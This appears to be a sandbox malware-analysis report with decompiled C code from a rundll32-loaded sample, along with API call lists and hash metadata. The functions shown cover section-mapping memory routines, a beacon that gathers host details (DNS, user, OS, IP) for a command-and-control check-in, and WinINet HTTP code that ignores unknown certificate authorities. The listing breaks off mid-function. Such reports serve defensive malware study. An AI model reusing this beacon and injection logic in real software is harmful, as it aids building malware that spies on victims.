                                				int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				int _v28;
                                				int _v32;
                                				intOrPtr _v36;
                                				int _v40;
                                				int _v44;
                                				void* _v48;
                                				void* __esi;
                                				long _t34;
                                				void* _t39;
                                				void* _t47;
                                				intOrPtr* _t48;
                                
                                				_t48 = __eax;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v48 = 0x18;
                                				_v44 = 0;
                                				_v36 = 0x40;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v28 = 0;
                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                				if(_t34 < 0) {
                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                				} else {
                                					 *_t48 = _v16;
                                					_t39 = E03436D0A(_t48,  &_v12); // executed
                                					_t47 = _t39;
                                					if(_t47 != 0) {
                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                					} else {
                                						memset(_v12, 0, _v24);
                                						 *_a4 = _v12;
                                					}
                                				}
                                				return _t47;
                                			}

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0343459D), ref: 03431969
                                  • Part of subcall function 03436D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0343197E,00000002,00000000,?,?,00000000,?,?,0343197E,00000000), ref: 03436D37
                                • memset.NTDLL ref: 0343198B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID:
                                • API String ID: 2533685722-0
                                • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction ID: 4312233570919d60fc4521c14373c303a1d7c1907fe703a8d98e05decf33235a
                                • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction Fuzzy Hash: 16213BB5D00209AFDB00DFA9C8809EEFBB9EF49214F10446AE516F7210D7309A098F64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034341FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				signed int _t11;
                                				void* _t16;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E034361FC(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0; // executed
                                					_t16 = E03432AE4(__ecx, _a4, _a8, _t25); // executed
                                					_t22 = _t16;
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E03434822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0x343a2d8, 0, _t25);
                                				}
                                				return _t22;
                                			}

                                APIs
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,055E93F4), ref: 03434232
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,055E93F4), ref: 03434260
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID:
                                • API String ID: 1500278894-0
                                • Opcode ID: 1a3fe0a137a56826d45b85a7ef0d62a6c4da6164b83460332080218df9e2fad2
                                • Instruction ID: a9c9a71eb9a2e7b89137cefa96969cefdc902e412b3cae84c1ec47e6f5b6c8d4
                                • Opcode Fuzzy Hash: 1a3fe0a137a56826d45b85a7ef0d62a6c4da6164b83460332080218df9e2fad2
                                • Instruction Fuzzy Hash: E2015E35204249BADB21AE959C44EDB7BB8FB8A750F00042AFA40AF260D6B19954D754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressMemory64ProcReadVirtualWow64
                                • String ID:
                                • API String ID: 752694512-0
                                • Opcode ID: f9ff5d5cd5bd7dbc5a6704ee0d56b277a39e1d5a13043fb2718859640afb4922
                                • Instruction ID: 614aed6e8e9b735a2494c99bfb1306f2ffbf4701ddd542897780773424921bd2
                                • Opcode Fuzzy Hash: f9ff5d5cd5bd7dbc5a6704ee0d56b277a39e1d5a13043fb2718859640afb4922
                                • Instruction Fuzzy Hash: A2F0F976500108BFCB12EF99DC45C9EBBF9EB98750714455BF904DB224D2719952DB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                • Instruction ID: 87e1a0b947aee6a6beaac2372a50fb24d6acd59acb28ebc730eaad4e854463a5
                                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                • Instruction Fuzzy Hash: 0EF012B690020CFFDB119FA5CC85CEFBBBDEF44244B00882AF652E5050D2319E189B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E03436D0A(void** __esi, PVOID* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				long _t13;
                                
                                				_v16 = 0;
                                				asm("stosd");
                                				_v8 = 0;
                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                				if(_t13 < 0) {
                                					_push(_t13);
                                					return __esi[6]();
                                				}
                                				return 0;
                                			}

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0343197E,00000002,00000000,?,?,00000000,?,?,0343197E,00000000), ref: 03436D37
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: a5b2e6334380ea6dd9c8e7dce8f082cb13222fd5b8306a28b3012dec6d92e4a5
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: 6AF012B590020DBFDB119FA5CCC5CAFBBBDEB49294B10493AF552E6090D6309E188A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0349A400), ref: 034774C5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID:
                                • API String ID: 1778838933-0
                                • Opcode ID: 15ceaba2af7ad5c7f740ad5f7f78291524f230d2547b300d0124367e7bd80f6f
                                • Instruction ID: 7c06fd74c591fa90385cfb5b4e48f04297390536ea2b69a3d7a99368c7ce13f8
                                • Opcode Fuzzy Hash: 15ceaba2af7ad5c7f740ad5f7f78291524f230d2547b300d0124367e7bd80f6f
                                • Instruction Fuzzy Hash: 8AF09A317000149B8720DE29D884EEBBFA9FB023907944056E900EF224D260F901CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 70%
                                			E034356C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				void* _v48;
                                				intOrPtr _v56;
                                				void* __edi;
                                				intOrPtr _t32;
                                				void* _t33;
                                				intOrPtr _t35;
                                				intOrPtr _t36;
                                				intOrPtr _t37;
                                				intOrPtr _t38;
                                				intOrPtr _t39;
                                				void* _t42;
                                				intOrPtr _t43;
                                				int _t46;
                                				intOrPtr _t47;
                                				int _t50;
                                				void* _t51;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				void* _t69;
                                				intOrPtr _t74;
                                				intOrPtr _t80;
                                				intOrPtr _t83;
                                				intOrPtr _t86;
                                				int _t89;
                                				intOrPtr _t90;
                                				int _t93;
                                				intOrPtr _t95;
                                				int _t98;
                                				intOrPtr _t100;
                                				int _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t110;
                                				void* _t112;
                                				void* _t113;
                                				intOrPtr _t114;
                                				long _t116;
                                				intOrPtr* _t117;
                                				intOrPtr* _t118;
                                				long _t119;
                                				int _t120;
                                				void* _t121;
                                				void* _t122;
                                				void* _t123;
                                				void* _t126;
                                				void* _t127;
                                				void* _t129;
                                				void* _t130;
                                
                                				_t110 = __edx;
                                				_t106 = __ecx;
                                				_t127 =  &_v16;
                                				_t119 = __eax;
                                				_t32 =  *0x343a3e0; // 0x55e9b78
                                				_v4 = _t32;
                                				_v8 = 8;
                                				_t33 = RtlAllocateHeap( *0x343a2d8, 0, 0x800); // executed
                                				_t105 = _t33;
                                				if(_t105 != 0) {
                                					if(_t119 == 0) {
                                						_t119 = GetTickCount();
                                					}
                                					_t35 =  *0x343a018; // 0x95dc214e
                                					asm("bswap eax");
                                					_t36 =  *0x343a014; // 0x3a87c8cd
                                					asm("bswap eax");
                                					_t37 =  *0x343a010; // 0xd8d2f808
                                					asm("bswap eax");
                                					_t38 =  *0x343a00c; // 0x81762942
                                					asm("bswap eax");
                                					_t39 =  *0x343a348; // 0x21ad5a8
                                					_t3 = _t39 + 0x343b62b; // 0x74666f73 = "soft" (first 4 bytes of the format string used below)
                                					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x343a02c,  *0x343a004, _t119);
                                					_t42 = E03436927();
                                					_t43 =  *0x343a348; // 0x21ad5a8
                                					_t4 = _t43 + 0x343b66b; // 0x74707526 = "&upt" (little-endian ASCII)
                                					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
                                					_t129 = _t127 + 0x38;
                                					_t121 = _t120 + _t46;
                                					if(_a12 != 0) {
                                						_t100 =  *0x343a348; // 0x21ad5a8
                                						_t8 = _t100 + 0x343b676; // 0x732526 = "&%s"
                                						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                                						_t129 = _t129 + 0xc;
                                						_t121 = _t121 + _t103;
                                					}
                                					_t47 =  *0x343a348; // 0x21ad5a8
                                					_t10 = _t47 + 0x343b2de; // 0x74636126 = "&act"
                                					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                                					_t130 = _t129 + 0xc;
                                					_t122 = _t121 + _t50; // executed
                                					_t51 = E034322D7(_t106); // executed
                                					_t112 = _t51;
                                					if(_t112 != 0) {
                                						_t95 =  *0x343a348; // 0x21ad5a8
                                						_t12 = _t95 + 0x343b8d0; // 0x736e6426 = "&dns"
                                						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t98;
                                						HeapFree( *0x343a2d8, 0, _t112);
                                					}
                                					_t113 = E03432A11();
                                					if(_t113 != 0) {
                                						_t90 =  *0x343a348; // 0x21ad5a8
                                						_t14 = _t90 + 0x343b8d8; // 0x6f687726 = "&who"
                                						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t93;
                                						HeapFree( *0x343a2d8, 0, _t113);
                                					}
                                					_t114 =  *0x343a3cc; // 0x55e95b0
                                					_a20 = E03432509(0x343a00a, _t114 + 4);
                                					_t55 =  *0x343a370; // 0x0
                                					_t116 = 0;
                                					if(_t55 != 0) {
                                						_t86 =  *0x343a348; // 0x21ad5a8
                                						_t17 = _t86 + 0x343b8b2; // 0x3d736f26 = "&os="
                                						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t89;
                                					}
                                					_t56 =  *0x343a36c; // 0x0
                                					if(_t56 != _t116) {
                                						_t83 =  *0x343a348; // 0x21ad5a8
                                						_t19 = _t83 + 0x343b889; // 0x3d706926 = "&ip="
                                						wsprintfA(_t122 + _t105, _t19, _t56);
                                					}
                                					if(_a20 != _t116) {
                                						_t123 = RtlAllocateHeap( *0x343a2d8, _t116, 0x800);
                                						if(_t123 != _t116) {
                                							E03431BE9(GetTickCount());
                                							_t62 =  *0x343a3cc; // 0x55e95b0
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x343a3cc; // 0x55e95b0
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x343a3cc; // 0x55e95b0
                                							_t69 = E03431D33(1, _t110, _t105,  *_t68); // executed
                                							_t126 = _t69;
                                							asm("lock xadd [eax], ecx");
                                							if(_t126 != _t116) {
                                								StrTrimA(_t126, 0x343928c);
                                								_push(_t126);
                                								_t74 = E0343393C();
                                								_v20 = _t74;
                                								if(_t74 != _t116) {
                                									_t117 = __imp__;
                                									 *_t117(_t126, _v8);
                                									 *_t117(_t123, _v8);
                                									_t118 = __imp__;
                                									 *_t118(_t123, _v32);
                                									 *_t118(_t123, _t126);
                                									_t80 = E0343375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                                									_v56 = _t80;
                                									if(_t80 != 0 && _t80 != 0x10d2) {
                                										E0343561E();
                                									}
                                									HeapFree( *0x343a2d8, 0, _v48);
                                									_t116 = 0;
                                								}
                                								HeapFree( *0x343a2d8, _t116, _t126);
                                							}
                                							RtlFreeHeap( *0x343a2d8, _t116, _t123); // executed
                                						}
                                						HeapFree( *0x343a2d8, _t116, _a12);
                                					}
                                					RtlFreeHeap( *0x343a2d8, _t116, _t105); // executed
                                				}
                                				return _v16;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 034356F0
                                • GetTickCount.KERNEL32 ref: 03435704
                                • wsprintfA.USER32 ref: 03435753
                                • wsprintfA.USER32 ref: 03435770
                                • wsprintfA.USER32 ref: 03435791
                                • wsprintfA.USER32 ref: 034357A9
                                • wsprintfA.USER32 ref: 034357CC
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034357DC
                                • wsprintfA.USER32 ref: 034357FE
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0343580E
                                • wsprintfA.USER32 ref: 03435847
                                • wsprintfA.USER32 ref: 03435867
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03435882
                                • GetTickCount.KERNEL32 ref: 03435892
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 034358A6
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034358C4
                                • StrTrimA.SHLWAPI(00000000,0343928C,00000000,055E95B0), ref: 034358F6
                                • lstrcpy.KERNEL32(00000000,?), ref: 03435915
                                • lstrcpy.KERNEL32(00000000,?), ref: 0343591C
                                • lstrcat.KERNEL32(00000000,?), ref: 03435929
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0343592D
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0343595D
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0343596D
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,055E95B0), ref: 0343597B
                                • HeapFree.KERNEL32(00000000,?), ref: 0343598C
                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0343599A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                • String ID:
                                • API String ID: 2591679948-0
                                • Opcode ID: 35838d66addf79441c3d2e8a951829995a5c3ce957b6a6fe4b8a886d6669c461
                                • Instruction ID: 7438ae6b238f41792aac047c500d13018834c2911977fdfc573cc82993ae0dfb
                                • Opcode Fuzzy Hash: 35838d66addf79441c3d2e8a951829995a5c3ce957b6a6fe4b8a886d6669c461
                                • Instruction Fuzzy Hash: 6281CF71040204AFC711FFA5EC88E9B7BF8EB8A700B190515F888EF265D731E915DB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 03473528
                                • RtlDeleteCriticalSection.NTDLL(0349A3E0), ref: 0347355B
                                • RtlDeleteCriticalSection.NTDLL(0349A400), ref: 03473562
                                • ReleaseMutex.KERNEL32(000005CC,00000000,?,?,?,0348E846), ref: 0347358B
                                • FindCloseChangeNotification.KERNEL32(?,?,0348E846), ref: 03473597
                                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0348E846), ref: 034735A3
                                • CloseHandle.KERNEL32(?,?,0348E846), ref: 034735AF
                                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 034735B5
                                • SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 034735C9
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0348E846), ref: 034735ED
                                • RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 03473623
                                • SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 0347363F
                                • FindCloseChangeNotification.KERNEL32(0616F2C0,?,?,0348E846), ref: 03473668
                                • LocalFree.KERNEL32(?,?,0348E846), ref: 03473678
                                  • Part of subcall function 03471268: GetVersion.KERNEL32(?,?,76CDF720,?,03473517,00000000,?,?,?,0348E846), ref: 0347128C
                                  • Part of subcall function 03471268: GetModuleHandleA.KERNEL32(?,061697B5,?,76CDF720,?,03473517,00000000,?,?,?,0348E846), ref: 034712A9
                                  • Part of subcall function 03471268: GetProcAddress.KERNEL32(00000000), ref: 034712B0
                                  • Part of subcall function 0348E869: RtlEnterCriticalSection.NTDLL(0349A400), ref: 0348E873
                                  • Part of subcall function 0348E869: RtlLeaveCriticalSection.NTDLL(0349A400), ref: 0348E8AF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                • String ID:
                                • API String ID: 1259384122-0
                                • Opcode ID: d84e44a6f133efd32d08068b8c20a3520c8105747e55b960abe64ca3e9f36732
                                • Instruction ID: bb10ca680d3b8b89f9e8852fb847a1b7979ec09f20dee1156c6fe2073986f0d0
                                • Opcode Fuzzy Hash: d84e44a6f133efd32d08068b8c20a3520c8105747e55b960abe64ca3e9f36732
                                • Instruction Fuzzy Hash: 19416075B00301ABDB71FF65E986A9A77E9AB20740B590067E500FF3A8DB71D840DA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E03437AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
                                				_v16 = 0xea60; // 60000 ms, used below as the send/receive timeout
                                				__imp__( *(__esi + 4)); // lstrlen of the URL stored at __esi+4 (see APIs below)
                                				_v12 = __eax + __eax;
                                				_t56 = E03436D63(__eax + __eax + 1); // heap-allocate a buffer of twice the URL length
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E03436C2C(_t56); // canonicalisation failed: free the new buffer
                                					} else {
                                						E03436C2C( *(__esi + 4)); // replace the original URL with its canonical form
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
                                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed; _a4 = user agent, 0x10000000 = INTERNET_FLAG_ASYNC
                                				 *(_t65 + 0x10) = _t34;
                                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E03437A86) == 0xffffffff) { // 0xffffffff = INTERNET_INVALID_STATUS_CALLBACK
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
                                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed; port 0x50 = 80, service 3 = INTERNET_SERVICE_HTTP
                                					 *(_t65 + 0x14) = _t38;
                                					if(_t38 != 0 || GetLastError() == 0x3e5 && E03436E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) { // 0x3e5 = ERROR_IO_PENDING: wait up to 60 s on the event for the async connect
                                						_t59 =  *0x343a348; // 0x21ad5a8
                                						_t15 = _t59 + 0x343b73b; // 0x544547 = "GET"
                                						_v8 = 0x84404000;
                                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed; flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
                                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) { // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
                                							_v8 = _v8 | 0x00000100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA: accept certificates from unknown CAs
                                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                						}
                                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) { // 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both 60000 ms
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}

                                APIs
                                • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 03437B03
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 03437B26
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 03437B4E
                                • InternetSetStatusCallback.WININET(00000000,03437A86), ref: 03437B65
                                • ResetEvent.KERNEL32(?), ref: 03437B77
                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 03437B8A
                                • GetLastError.KERNEL32 ref: 03437B97
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 03437BDD
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 03437BFB
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 03437C1C
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 03437C28
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 03437C38
                                • GetLastError.KERNEL32 ref: 03437C42
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 71ba108df494f473a8f80e97d926e81630aa753e1a63db5de415be89a6c97a31
                                • Instruction ID: 79a417271e021d26d418fdde2b2182b0dfad1f1fac4e0c465c9f3fe4279977fa
                                • Opcode Fuzzy Hash: 71ba108df494f473a8f80e97d926e81630aa753e1a63db5de415be89a6c97a31
                                • Instruction Fuzzy Hash: 7C41AFB1540204BFDB31AF61DC49E5BBFBDEB4A700F24492AF582EB194E7719904CB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                C-Code - Quality: 51%
                                			E03437F35(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
